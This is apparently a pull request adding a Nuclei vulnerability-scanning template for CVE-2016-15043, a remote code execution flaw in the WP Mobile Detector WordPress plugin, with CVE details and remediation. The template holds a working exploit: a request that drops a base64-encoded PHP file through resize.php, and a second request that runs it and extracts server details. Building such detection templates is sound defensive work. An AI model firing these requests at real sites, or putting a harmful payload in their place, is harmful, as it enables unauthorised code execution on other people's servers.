### PR TITLE
Add CVE-2016-15043: WP Mobile Detector RCE

### DIFF
--- a/http/cves/2016/CVE-2016-15043.yaml
+++ b/http/cves/2016/CVE-2016-15043.yaml
@@ -1,0 +1,73 @@
+id: CVE-2016-15043
+
+info:
+  name: WP Mobile Detector <= 3.5 - Remote Code Execution
+  author: bluekeys
+  severity: critical
+  description: |
+    The WP Mobile Detector plugin for WordPress is vulnerable to remote code execution 
+    via the resize.php script due to improper validation of the 'src' parameter. 
+    This allows unauthenticated attackers to upload and execute arbitrary PHP code 
+    via data URIs.
+  impact: |
+    Remote unauthenticated attackers can execute arbitrary PHP code, potentially 
+    leading to full system compromise, data exfiltration, and persistent access.
+  remediation: |
+    Upgrade to a version beyond 3.5 or remove the plugin. Ensure the /cache 
+    directory does not have execution permissions.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-15043
+    - https://www.pluginvulnerabilities.com/2016/05/31/arbitrary-file-upload-vulnerability-in-wp-mobile-detector/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2016-15043
+    cwe-id: CWE-434,CWE-94
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: wp-mobile-detector_project
+    product: wp-mobile-detector
+    framework: wordpress
+    shodan-query: http.html:"/wp-content/plugins/wp-mobile-detector/"
+  tags: cve,cve2016,wordpress,wp-plugin,rce,fileupload,intrusive
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-mobile-detector/resize.php?src=data:text/php;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=/info.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-content/plugins/wp-mobile-detector/cache/info.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, 'PHP Version')"
+          - "contains(body, 'Configuration')"
+        condition: and
+
+    extractors:
+      - type: regex
+        name: php_version
+        part: body
+        group: 1
+        regex:
+          - 'PHP Version .?<\/td><td class="v">([^<]+)'
+
+      - type: regex
+        name: system_os
+        part: body
+        group: 1
+        regex:
+          - 'System .?<\/td><td class="v">([^<]+)'
+
+      - type: regex
+        name: internal_ip
+        part: body
+        group: 1
+        regex:
+          - '_SERVER\["SERVER_ADDR"\]<\/td><td class="v">([^<]+)'


### PR DESCRIPTION
/claim #14673

### PR Information

This PR adds a new template for CVE-2016-15043, a Remote Code Execution (RCE) vulnerability in the WP Mobile Detector WordPress plugin (versions 3.5 and below).

- Added CVE-2016-15043

References:
- https://nvd.nist.gov/vuln/detail/CVE-2016-15043

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

The template was validated against a local lab environment running PHP 5.6 and the WP Mobile Detector v3.5 plugin.

The template utilizes the src parameter in resize.php to process a data: URI, writing a base64 encoded PHP PoC to the /cache/ directory.

Verification: A second request executes the dropped file.

DSL Matchers: Confirms a 200 OK status and the presence of phpinfo() output strings for high-confidence detection.

Extractors: Captures PHP Version, System OS, and Internal IP from the resulting page.

- Scan
<img width="2124" height="487" alt="image" src="https://github.com/user-attachments/assets/bc1e9205-28b4-4239-831d-ee7f43daeccb" />

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
